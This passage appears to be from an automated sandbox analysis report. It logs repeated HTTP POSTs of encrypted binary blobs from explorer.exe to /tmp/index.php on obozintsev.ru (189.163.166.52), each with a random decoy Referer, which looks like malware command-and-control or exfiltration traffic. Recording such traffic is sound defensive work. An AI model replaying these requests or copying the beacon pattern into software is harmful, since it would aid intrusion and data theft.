Nov 30, 2024 11:12:56.207856894 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fgrdwevlbrdtr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 359 Host: obozintsev.ru
Nov 30, 2024 11:12:56.207885027 CET	359	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 44 22 a1 9e Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuD"DA_dif'$<15iZpheZ-LGlLGHtA3D%q?"RF.V:,R,aUinWGcYZ5d
Nov 30, 2024 11:12:57.958450079 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:57 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49755	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:58.086781979 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://natewkewlwih.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 275 Host: obozintsev.ru
Nov 30, 2024 11:12:58.086811066 CET	275	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 40 52 b4 80 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu@Rqk[SOs!y^^m?:9Fx0bWCYp9C?7[l>?d&D#M3u9Ak$-^y
Nov 30, 2024 11:12:59.830614090 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49761	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:59.953778028 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fhaalrvyqueiyk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: obozintsev.ru
Nov 30, 2024 11:12:59.953802109 CET	135	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 72 4f fe fb Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vurOV)ltlA{dpd?XBwomi
Nov 30, 2024 11:13:01.802746058 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49767	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:01.925877094 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ujchxvegkeooch.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: obozintsev.ru
Nov 30, 2024 11:13:01.925900936 CET	149	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 7f 46 be f2 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuFD&H;MhlWGPd[=CAU/C{BeZ
Nov 30, 2024 11:13:03.676213026 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49773	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:03.799493074 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pkapxutderw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 211 Host: obozintsev.ru
Nov 30, 2024 11:13:03.799519062 CET	211	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 3f 01 d8 99 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu?bEu}9Nq'p$9qk;Au(9c\|-Pw{KP]``R(I+nr
Nov 30, 2024 11:13:05.639331102 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49778	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:05.767579079 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dqdghghmtaygindm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 264 Host: obozintsev.ru
Nov 30, 2024 11:13:05.767607927 CET	264	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 60 30 ac bc Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu`0U!O^#AQqctDa;KMFN-'&J--VWZM"a8ITSBdlyA^N;0bSWHa=\7&#{
Nov 30, 2024 11:13:07.570679903 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49780	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:07.693670988 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ievirvwtsxbiyvql.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: obozintsev.ru
Nov 30, 2024 11:13:07.693706036 CET	338	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 7f 02 ad 92 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vupCZ*;d#Deg\|;:(MT] on$8B rMN$?:0/Py0gMOG2v
Nov 30, 2024 11:13:09.507329941 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16 Data Ascii: #\6cB1I!#1Uc;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49797	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:13.461258888 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cdwxnwopeyrbni.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 327 Host: obozintsev.ru
Nov 30, 2024 11:13:13.461287975 CET	327	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 1f 6b 2c 90 f5 76 0b 75 46 1d a5 e2 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA ,[k,vuFdD{e_cL-V{B9:@?#5'@2,H@d[nykG^6^Q!l]Bk\k(biL$3ZA`gP&y
Nov 30, 2024 11:13:15.257535934 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49803	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:15.396183014 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fgbhvviibbt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 118 Host: obozintsev.ru
Nov 30, 2024 11:13:15.396204948 CET	118	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 46 0c d9 ad Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuF?R07{1f.?][
Nov 30, 2024 11:13:17.454736948 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49809	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:17.578808069 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://miptxmfamtohobtx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: obozintsev.ru
Nov 30, 2024 11:13:17.578838110 CET	363	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 33 0c c8 a0 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu3XJ]YRm&N3foOMw5H.0n!.;(uMDi5.a+WC&U"cFYM_%F?Oeu!=l
Nov 30, 2024 11:13:19.368659019 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:19 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49815	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:19.497152090 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jwqwkqwentbhrv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: obozintsev.ru
Nov 30, 2024 11:13:19.497152090 CET	204	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 4f 0a bd 9b Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuOwNU=r\HO}rpyB,^=:WjbGY+%s8E#{uC
Nov 30, 2024 11:13:21.288722992 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 